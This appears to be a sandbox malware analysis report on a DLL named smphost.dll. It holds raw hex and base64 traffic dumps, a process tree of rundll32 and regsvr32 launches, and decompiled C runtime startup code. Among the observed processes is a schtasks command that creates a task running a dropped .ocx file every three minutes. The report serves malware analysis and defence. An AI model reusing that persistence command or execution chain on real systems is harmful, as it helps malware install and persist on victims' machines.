2f 0d 0a 68 47 4d 6e 75 70 65 35 32 69 61 70 76 66 2f 70 4d 46 54 37 2f 34 47 4e 57 50 37 77 2f 2b 6b 6c 4f 61 4f 4d 79 75 56 36 71 62 47 6f 71 78 Data Ascii: LTbzmv0/7ktP+oZbNqKeTFvv/i0246aZP+/+CjRT/kqea8DzJqMXahv7//+mmVPH/i0276Y5Plqf4zNTMqLG+0VT7/42NHPT//+mHVPv/5tXbv5fNvjMDuf+LjaD+//XpclT0/42NaaaMvoFVA7WoyY2Q/v//6VZU+/+EjYj+kqeaEDzJqMParv3//+lGVPH/i413/v//hGMnupe52iapvf/pMFT7/4GNWP7w/+klOaOMyuV6qbGoqx
2022-01-30 12:44:51 UTC	2625	IN	Data Raw: 4f 4e 6e 71 78 7a 63 42 2f 68 51 36 48 2f 50 2f 66 58 47 67 45 53 6c 42 78 41 41 68 70 37 34 70 44 58 78 6d 34 49 43 79 65 79 44 37 41 67 50 56 38 70 6d 44 78 4e 4b 2b 4f 73 53 0d 0a 35 68 32 4c 77 71 67 7a 33 41 4f 72 77 64 45 41 69 55 58 34 69 55 66 38 67 33 33 7a 41 48 63 69 48 31 37 77 50 4a 41 76 4a 46 51 39 51 6d 6f 42 69 31 58 38 55 6f 46 46 2b 46 44 6e 4c 38 2f 39 0d 0a 6b 70 37 7a 6c 63 67 31 52 30 36 38 68 49 76 6c 58 63 50 4d 7a 46 2b 4c 37 49 50 6a 43 41 39 58 72 54 35 38 55 69 33 4b 76 46 7a 63 42 2f 69 44 77 41 47 4c 54 66 61 44 30 51 43 47 52 66 69 4a 0d 0a 49 4b 54 77 50 4a 51 79 49 47 77 6c 52 49 4e 39 2b 41 52 7a 47 6d 41 41 61 67 47 45 56 66 78 53 35 68 32 4c 45 59 44 74 6d 62 4f 6f 68 49 42 77 6f 67 63 51 41 4f 48 47 69 2b 56 53 77 38 Data Ascii: ONnqxzcB/hQ6H/P/fXGgESlBxAAhp74pDXxm4ICyeyD7AgPV8pmDxNK+OsS5h2Lwqgz3AOrwdEAiUX4iUf8g33zAHciH17wPJAvJFQ9QmoBi1X8UoFF+FDnL8/9kp7zlcg1R068hIvlXcPMzF+L7IPjCA9XrT58Ui3KvFzcB/iDwAGLTfaD0QCGRfiJIKTwPJQyIGwlRIN9+ARzGmAAagGEVfxS5h2LEYDtmbOohIBwogcQAOHGi+VSw8
2022-01-30 12:44:51 UTC	2641	IN	Data Raw: 50 38 44 41 41 41 4b 41 41 41 41 66 56 68 7a 51 57 55 79 56 30 35 67 51 67 41 41 45 77 41 41 41 47 34 4a 41 41 41 66 41 41 41 41 0d 0a 2f 46 68 7a 51 55 45 79 56 30 35 63 51 77 41 41 46 67 41 41 41 48 6f 41 41 41 41 54 41 41 41 41 50 56 68 7a 51 58 6b 79 56 30 35 56 51 67 41 41 41 67 41 41 41 43 30 41 41 41 41 54 41 41 41 41 0d 0a 59 56 68 7a 51 57 55 79 56 30 35 59 51 67 41 41 45 77 41 41 41 41 73 41 41 41 41 6e 41 41 41 41 61 31 68 7a 51 58 34 79 56 30 34 73 51 67 41 41 41 67 41 41 41 46 30 41 41 41 41 5a 41 41 41 41 0d 0a 54 46 68 7a 51 55 38 79 56 30 36 44 51 67 41 41 4a 77 41 41 41 49 6b 41 41 41 41 5a 41 41 41 41 69 31 74 7a 51 57 55 79 56 30 35 66 51 67 41 41 44 41 41 41 41 42 38 41 41 41 41 45 41 41 41 41 0d 0a 66 46 68 7a 51 58 6f 79 56 30 35 6c Data Ascii: P8DAAAKAAAAfVhzQWUyV05gQgAAEwAAAG4JAAAfAAAA/FhzQUEyV05cQwAAFgAAAHoAAAATAAAAPVhzQXkyV05VQgAAAgAAAC0AAAATAAAAYVhzQWUyV05YQgAAEwAAAAsAAAAnAAAAa1hzQX4yV04sQgAAAgAAAF0AAAAZAAAATFhzQU8yV06DQgAAJwAAAIkAAAAZAAAAi1tzQWUyV05fQgAADAAAAB8AAAAEAAAAfFhzQXoyV05l
2022-01-30 12:44:51 UTC	2657	IN	Data Raw: 55 67 79 4c 6b 34 34 51 6e 55 41 63 67 41 67 41 48 6f 41 63 67 42 67 41 47 63 41 0d 0a 48 31 67 53 51 51 55 79 64 30 34 30 51 6d 45 41 62 67 41 67 41 47 6b 41 59 51 42 36 41 48 4d 41 43 46 68 54 51 51 6b 79 4f 55 35 33 51 6d 45 41 63 77 42 7a 41 47 38 41 63 67 42 37 41 47 6b 41 0d 0a 41 6c 67 64 51 57 49 79 4d 55 34 32 51 6d 6b 41 62 41 42 31 41 48 67 41 5a 51 41 6a 41 43 41 41 48 6c 67 57 51 51 30 79 64 30 34 6a 51 6d 67 41 5a 51 41 67 41 46 77 41 61 51 42 38 41 48 55 41 0d 0a 44 46 67 66 51 55 67 79 46 45 35 38 51 69 73 41 49 41 42 6b 41 47 55 41 59 77 42 36 41 47 30 41 43 46 67 64 51 52 77 79 4e 6b 34 6a 51 6d 6b 41 62 77 42 75 41 43 6f 41 62 77 42 68 41 43 41 41 0d 0a 44 46 67 41 51 52 73 79 4d 6b 34 6c 51 6e 51 41 63 77 41 41 41 43 49 41 55 41 42 39 Data Ascii: UgyLk44QnUAcgAgAHoAcgBgAGcAH1gSQQUyd040QmEAbgAgAGkAYQB6AHMACFhTQQkyOU53QmEAcwBzAG8AcgB7AGkAAlgdQWIyMU42QmkAbAB1AHgAZQAjACAAHlgWQQ0yd04jQmgAZQAgAFwAaQB8AHUADFgfQUgyFE58QisAIABkAGUAYwB6AG0ACFgdQRwyNk4jQmkAbwBuACoAbwBhACAADFgAQRsyMk4lQnQAcwAAACIAUAB9
2022-01-30 12:44:51 UTC	2673	IN	Data Raw: 47 38 45 41 41 44 66 36 41 59 51 0d 0a 42 6c 78 7a 51 59 6a 61 55 56 34 37 52 67 41 41 38 4f 67 47 45 49 73 45 41 41 44 7a 36 41 59 51 62 46 42 7a 51 57 44 62 55 56 35 54 53 67 41 41 50 4d 34 47 45 41 30 49 41 41 41 62 36 51 59 51 0d 0a 5a 46 42 7a 51 55 6a 62 55 56 35 64 53 67 41 41 4c 4f 6b 47 45 41 59 49 41 41 41 33 36 51 59 51 66 56 42 7a 51 53 7a 62 55 56 35 45 53 67 41 41 55 4f 6b 47 45 42 34 49 41 41 42 54 36 51 59 51 0d 0a 65 31 42 7a 51 51 44 62 55 56 35 4e 53 67 41 41 64 4f 6b 47 45 42 63 49 41 41 43 44 36 51 59 51 51 56 42 7a 51 66 44 62 55 56 35 73 53 67 41 41 73 4f 6b 47 45 44 51 49 41 41 43 7a 36 51 59 51 0d 0a 4c 6c 42 7a 51 61 44 62 55 56 34 38 53 67 41 41 34 4f 6b 47 45 41 73 4d 41 41 44 2f 36 51 59 51 61 56 52 7a 51 5a 54 62 55 56 35 51 Data Ascii: G8EAADf6AYQBlxzQYjaUV47RgAA8OgGEIsEAADz6AYQbFBzQWDbUV5TSgAAPM4GEA0IAAAb6QYQZFBzQUjbUV5dSgAALOkGEAYIAAA36QYQfVBzQSzbUV5ESgAAUOkGEB4IAABT6QYQe1BzQQDbUV5NSgAAdOkGEBcIAACD6QYQQVBzQfDbUV5sSgAAsOkGEDQIAACz6QYQLlBzQaDbUV48SgAA4OkGEAsMAAD/6QYQaVRzQZTbUV5Q
2022-01-30 12:44:51 UTC	2689	IN	Data Raw: 6e 66 56 44 71 4c 6e 46 32 56 53 68 37 50 63 31 49 50 51 6f 41 49 4a 61 37 6b 58 6f 2f 31 7a 78 66 42 6e 66 7a 46 58 4e 58 51 74 54 43 4e 6b 74 37 50 39 69 64 38 75 70 4b 43 55 30 39 0d 0a 62 56 6a 6e 67 39 59 32 4b 33 45 67 2f 44 4f 49 4d 65 63 68 50 51 6f 41 74 4a 56 44 76 6e 77 2f 30 71 41 74 55 54 41 66 45 58 4e 58 51 70 67 38 34 48 64 39 50 7a 6f 63 6b 4a 34 75 68 55 38 39 0d 0a 62 56 6a 54 39 68 45 44 4b 58 45 72 59 4d 53 76 2b 31 45 38 50 51 6f 41 4a 41 63 57 36 33 34 2f 31 36 73 59 79 41 34 31 46 33 4e 58 51 6f 51 72 76 71 52 2f 50 35 59 58 75 6d 4b 4d 56 55 4d 39 0d 0a 62 56 6a 6a 30 31 77 64 31 33 46 39 7a 30 74 66 79 7a 77 71 50 51 6f 41 50 4a 72 5a 64 49 41 2f 75 46 36 2f 7a 42 41 35 48 6e 4e 58 51 67 34 79 73 64 47 41 50 33 31 5a 7a 31 59 71 Data Ascii: nfVDqLnF2VSh7Pc1IPQoAIJa7kXo/1zxfBnfzFXNXQtTCNkt7P9id8upKCU09bVjng9Y2K3Eg/DOIMechPQoAtJVDvnw/0qAtUTAfEXNXQpg84Hd9PzockJ4uhU89bVjT9hEDKXErYMSv+1E8PQoAJAcW634/16sYyA41F3NXQoQrvqR/P5YXumKMVUM9bVjj01wd13F9z0tfyzwqPQoAPJrZdIA/uF6/zBA5HnNXQg4ysdGAP31Zz1Yq
2022-01-30 12:44:51 UTC	2705	IN	Data Raw: 51 50 77 6f 41 41 41 44 76 74 4d 38 2f 62 56 68 7a 51 59 69 47 6d 48 46 58 51 67 41 41 67 47 2f 50 50 77 6f 41 41 41 43 50 62 38 38 2f 0d 0a 62 56 68 7a 51 55 67 59 6d 48 46 58 51 67 41 41 49 43 72 50 50 77 6f 41 41 41 44 50 35 4d 34 2f 62 56 68 7a 51 61 6a 57 6d 58 46 58 51 67 41 41 59 4a 2f 4f 50 77 6f 41 41 41 42 76 6e 38 34 2f 0d 0a 62 56 68 7a 51 57 68 6f 6d 58 46 58 51 67 41 41 41 46 72 4f 50 77 6f 41 41 41 43 66 47 38 34 2f 62 56 68 7a 51 66 67 70 6d 58 46 58 51 67 41 41 4d 4e 62 4e 50 77 6f 41 41 41 41 2f 31 73 30 2f 0d 0a 62 56 68 7a 51 61 69 6c 6d 6e 46 58 51 67 41 41 77 4a 66 4e 50 77 6f 41 41 41 42 66 57 63 30 2f 62 56 68 7a 51 54 68 72 6d 6e 46 58 51 67 41 41 34 42 72 4e 50 77 6f 41 41 41 44 76 47 73 30 2f 0d 0a 62 56 68 7a 51 51 6a 52 6d 33 Data Ascii: QPwoAAADvtM8/bVhzQYiGmHFXQgAAgG/PPwoAAACPb88/bVhzQUgYmHFXQgAAICrPPwoAAADP5M4/bVhzQajWmXFXQgAAYJ/OPwoAAABvn84/bVhzQWhomXFXQgAAAFrOPwoAAACfG84/bVhzQfgpmXFXQgAAMNbNPwoAAAA/1s0/bVhzQailmnFXQgAAwJfNPwoAAABfWc0/bVhzQThrmnFXQgAA4BrNPwoAAADvGs0/bVhzQQjRm3
2022-01-30 12:44:51 UTC	2721	IN	Data Raw: 31 55 58 73 79 56 30 34 4f 53 51 59 51 46 41 41 41 41 47 34 4c 42 68 41 50 41 41 41 41 0d 0a 41 6c 4e 31 55 58 34 79 56 30 34 74 53 51 59 51 46 77 41 41 41 49 38 4c 42 68 41 58 41 41 41 41 2f 56 4e 31 55 57 67 79 56 30 37 4d 53 51 59 51 47 67 41 41 41 4b 77 4c 42 68 41 55 41 41 41 41 0d 0a 33 46 4e 31 55 58 51 79 56 30 37 72 53 51 59 51 41 41 41 41 41 4d 30 4c 42 68 41 52 41 41 41 41 76 31 4e 31 55 58 63 79 56 30 36 4b 53 51 59 51 49 41 41 41 41 4f 49 4c 42 68 41 50 41 41 41 41 0d 0a 6e 6c 4e 31 55 55 6f 79 56 30 36 70 53 51 59 51 49 77 41 41 41 41 4d 4d 42 68 41 72 41 41 41 41 65 56 52 31 55 55 6f 33 78 46 64 78 51 67 41 41 41 47 30 48 45 41 6f 41 41 41 41 50 41 41 41 41 0d 0a 62 56 68 7a 51 57 67 79 56 30 35 58 51 67 41 41 41 51 41 41 41 50 58 2f 2f 2f Data Ascii: 1UXsyV04OSQYQFAAAAG4LBhAPAAAAAlN1UX4yV04tSQYQFwAAAI8LBhAXAAAA/VN1UWgyV07MSQYQGgAAAKwLBhAUAAAA3FN1UXQyV07rSQYQAAAAAM0LBhARAAAAv1N1UXcyV06KSQYQIAAAAOILBhAPAAAAnlN1UUoyV06pSQYQIwAAAAMMBhArAAAAeVR1UUo3xFdxQgAAAG0HEAoAAAAPAAAAbVhzQWgyV05XQgAAAQAAAPX///
2022-01-30 12:44:51 UTC	2737	IN	Data Raw: 41 41 4d 77 77 46 6a 49 2b 4d 70 59 79 0d 0a 33 47 71 31 64 4d 59 45 34 48 5a 78 66 67 41 41 41 46 41 41 41 43 6f 41 41 41 41 4a 4d 59 41 7a 75 32 74 56 64 78 34 45 6b 58 5a 42 65 32 59 37 74 6a 73 47 50 6c 77 2b 41 41 41 50 59 41 41 41 0d 0a 54 56 68 7a 51 63 34 43 6f 58 35 70 63 5a 59 7a 44 6a 5a 6d 4e 72 77 34 42 6a 6c 33 4f 39 59 37 6d 32 64 7a 51 57 68 43 56 30 35 4c 51 67 41 41 6c 6a 41 30 4d 55 77 78 51 44 52 5a 4e 78 59 34 0d 0a 75 32 41 6c 65 37 34 4a 6b 58 4e 58 77 67 41 41 48 41 41 41 41 41 77 77 52 6a 4a 5a 4e 43 59 33 7a 6d 44 51 65 31 51 4f 30 58 4e 78 66 4d 59 2b 41 4a 41 41 41 45 49 41 41 41 42 70 4d 4a 59 79 0d 0a 67 6d 75 48 63 6d 45 47 51 6e 70 4e 64 6c 67 32 58 54 62 33 4e 76 59 32 4a 6a 6d 77 4f 63 51 35 53 32 4b 79 65 36 34 49 63 58 Data Ascii: AAMwwFjI+MpYy3Gq1dMYE4HZxfgAAAFAAACoAAAAJMYAzu2tVdx4EkXZBe2Y7tjsGPlw+AAAPYAAATVhzQc4CoX5pcZYzDjZmNrw4Bjl3O9Y7m2dzQWhCV05LQgAAljA0MUwxQDRZNxY4u2Ale74JkXNXwgAAHAAAAAwwRjJZNCY3zmDQe1QO0XNxfMY+AJAAAEIAAABpMJYygmuHcmEGQnpNdlg2XTb3NvY2JjmwOcQ5S2Kye64IcX
2022-01-30 12:44:51 UTC	2753	IN	Data Raw: 57 66 62 66 74 67 4e 37 33 47 58 66 63 67 2f 30 44 2f 59 50 2b 6f 2f 36 44 2f 2f 50 2f 67 2f 62 61 68 31 51 55 51 7a 56 30 35 58 63 67 67 77 45 44 41 59 4d 43 6f 77 4b 44 41 2f 4d 44 67 77 0d 0a 4c 57 67 37 63 54 67 43 44 33 34 33 63 6d 67 77 63 44 42 34 4d 49 6f 77 69 44 43 66 4d 4a 67 77 7a 57 6a 62 63 64 67 43 37 33 36 58 63 73 67 77 30 44 44 59 4d 4f 6f 77 36 44 44 2f 4d 50 67 77 0d 0a 62 57 6c 37 63 48 67 44 54 33 39 33 63 79 67 78 4d 44 45 34 4d 55 6f 78 53 44 46 66 4d 56 67 78 44 57 6b 62 63 42 67 44 4c 33 2f 58 63 34 67 78 6b 44 47 59 4d 61 6f 78 71 44 47 2f 4d 62 67 78 0d 0a 72 57 6d 37 63 4c 67 44 6a 33 2b 33 63 2b 67 78 38 44 48 34 4d 51 6f 79 43 44 49 66 4d 68 67 79 54 57 70 62 63 31 67 41 62 33 77 58 63 45 67 79 55 44 4a 59 4d 6d 6f 79 61 44 Data Ascii: WfbftgN73GXfcg/0D/YP+o/6D//P/g/bah1QUQzV05XcggwEDAYMCowKDA/MDgwLWg7cTgCD343cmgwcDB4MIowiDCfMJgwzWjbcdgC736Xcsgw0DDYMOow6DD/MPgwbWl7cHgDT393cygxMDE4MUoxSDFfMVgxDWkbcBgDL3/Xc4gxkDGYMaoxqDG/MbgxrWm7cLgDj3+3c+gx8DH4MQoyCDIfMhgyTWpbc1gAb3wXcEgyUDJYMmoyaD

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exePID: 4536, Parent PID: 4796

General

Target ID:	0
Start time:	13:41:40
Start date:	30/01/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\smphost.dll"
Imagebase:	0xb50000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4540, Parent PID: 4536

General

Target ID:	1
Start time:	13:41:41
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 6260, Parent PID: 4536

General

Target ID:	3
Start time:	13:41:41
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll
Imagebase:	0x11c0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 4612, Parent PID: 4540

General

Target ID:	4
Start time:	13:41:41
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Imagebase:	0x850000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 4348, Parent PID: 4536

General

Target ID:	5
Start time:	13:41:42
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall
Imagebase:	0x850000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5100, Parent PID: 4536

General

Target ID:	8
Start time:	13:41:45
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer
Imagebase:	0x850000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 3940, Parent PID: 4536

General

Target ID:	12
Start time:	13:41:48
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer
Imagebase:	0x850000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 5552, Parent PID: 6260

General

Target ID:	23
Start time:	13:43:16
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Imagebase:	0x210000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 4360, Parent PID: 664

General

Target ID:	24
Start time:	13:43:18
Start date:	30/01/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Imagebase:	0x7ff6d3ae0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 5264, Parent PID: 4360

General

Target ID:	25
Start time:	13:43:19
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-e C:\ProgramData\6\5507.ocx
Imagebase:	0x11c0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 4424, Parent PID: 6260

General

Target ID:	30
Start time:	13:43:48
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 2076
Imagebase:	0xf10000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: loaddll32.exePID: 4536, Parent PID: 4796COMMON

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.8%
Total number of Nodes:	1519
Total number of Limit Nodes:	20

Executed Functions

Function 6E9E93FD Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E6E9E93FD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x6e9fa5f0);
				E6E9E9960(__ebx, __edi, __esi);
				_t34 =  *0x6e9fcfec; // 0x1
				if(_t34 > 0) {
					 *0x6e9fcfec = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6E9E8E91();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6e9fcfc8 - 2;
					if( *0x6e9fcfc8 != 2) {
						E6E9E9839(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x6e9fa618);
						E6E9E9960(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6E9E95B8( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6E9E92A3(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_push(_t72);
									_push( *((intOrPtr*)(_t82 + 8)));
									_t42 = E6E9E9A40();
									_t76 = _t42;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_push(_t42);
											_push( *((intOrPtr*)(_t82 + 8)));
											_t45 = E6E9E9A40();
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6E9E93FD(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E6E9E95B8( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6E9E92A3(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6E9E95B8( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6e9fcfec - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6E9E8F5C(__ebx, _t61, 1, __esi);
						E6E9E9A52();
						E6E9E9AB3();
						 *0x6e9fcfc8 =  *0x6e9fcfc8 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6E9E9492();
						_t54 = E6E9E90FE( *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6E9E949F();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

0x6e9e93fd
0x6e9e93fd
0x6e9e93ff
0x6e9e9404
0x6e9e9409
0x6e9e9410
0x6e9e9417
0x6e9e941f
0x6e9e9422
0x6e9e942b
0x6e9e942e
0x6e9e9431
0x6e9e9438
0x6e9e94a7
0x6e9e94ac
0x6e9e94ad
0x6e9e94af
0x6e9e94b4
0x6e9e94b9
0x6e9e94bc
0x6e9e94be
0x6e9e94cf
0x6e9e94cf
0x6e9e94d3
0x6e9e94d6
0x6e9e94e2
0x6e9e94e2
0x6e9e94ef
0x6e9e94f1
0x6e9e94f4
0x6e9e94f6
0x6e9e9501
0x6e9e9506
0x6e9e9508
0x6e9e950b
0x6e9e950d
0x00000000
0x00000000
0x6e9e950d
0x6e9e94d8
0x6e9e94d8
0x6e9e94db
0x00000000
0x6e9e94dd
0x6e9e94dd
0x6e9e9513
0x6e9e9513
0x6e9e9514
0x6e9e9515
0x6e9e9518
0x6e9e951d
0x6e9e951f
0x6e9e9522
0x6e9e9525
0x6e9e9527
0x6e9e9529
0x6e9e952b
0x6e9e952c
0x6e9e952d
0x6e9e9530
0x6e9e9535
0x6e9e9537
0x6e9e9537
0x6e9e953d
0x6e9e953e
0x6e9e9543
0x6e9e9549
0x6e9e9549
0x6e9e9529
0x6e9e954e
0x6e9e9550
0x6e9e9557
0x6e9e9561
0x6e9e9563
0x6e9e9566
0x6e9e9568
0x6e9e9574
0x6e9e959c
0x6e9e959c
0x6e9e9552
0x6e9e9552
0x6e9e9555
0x00000000
0x00000000
0x6e9e9555
0x6e9e9550
0x6e9e94db
0x6e9e959f
0x6e9e95a6
0x6e9e94c0
0x6e9e94c0
0x6e9e94c6
0x00000000
0x6e9e94c8
0x6e9e94c8
0x6e9e94c8
0x6e9e94c6
0x6e9e95ab
0x6e9e95b7
0x6e9e943a
0x6e9e943a
0x6e9e943f
0x6e9e9444
0x6e9e9449
0x6e9e9450
0x6e9e9454
0x6e9e945e
0x6e9e946a
0x6e9e946c
0x6e9e946c
0x6e9e946e
0x6e9e9471
0x6e9e9478
0x6e9e947d
0x00000000
0x6e9e947d
0x6e9e9412
0x6e9e9412
0x6e9e947f
0x6e9e9482
0x6e9e948e
0x6e9e948e

APIs

__RTC_Initialize.LIBCMT ref: 6E9E9444
___scrt_uninitialize_crt.LIBCMT ref: 6E9E945E

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 4d6da4f1d8af177ea3b73f4e339ee4b827ce6018f87e5cb3b28d19ac9abb5964
Instruction ID: f55bb1c7a68a81c4745f9035bd0c5f849aad8c644ee7d5be5b110934d8f437c0
Opcode Fuzzy Hash: 4d6da4f1d8af177ea3b73f4e339ee4b827ce6018f87e5cb3b28d19ac9abb5964
Instruction Fuzzy Hash: EA41D172E04665AFDB128FE9C800BDE7A7CEF95754F004899EE156BA40DB70CE418F90

Uniqueness

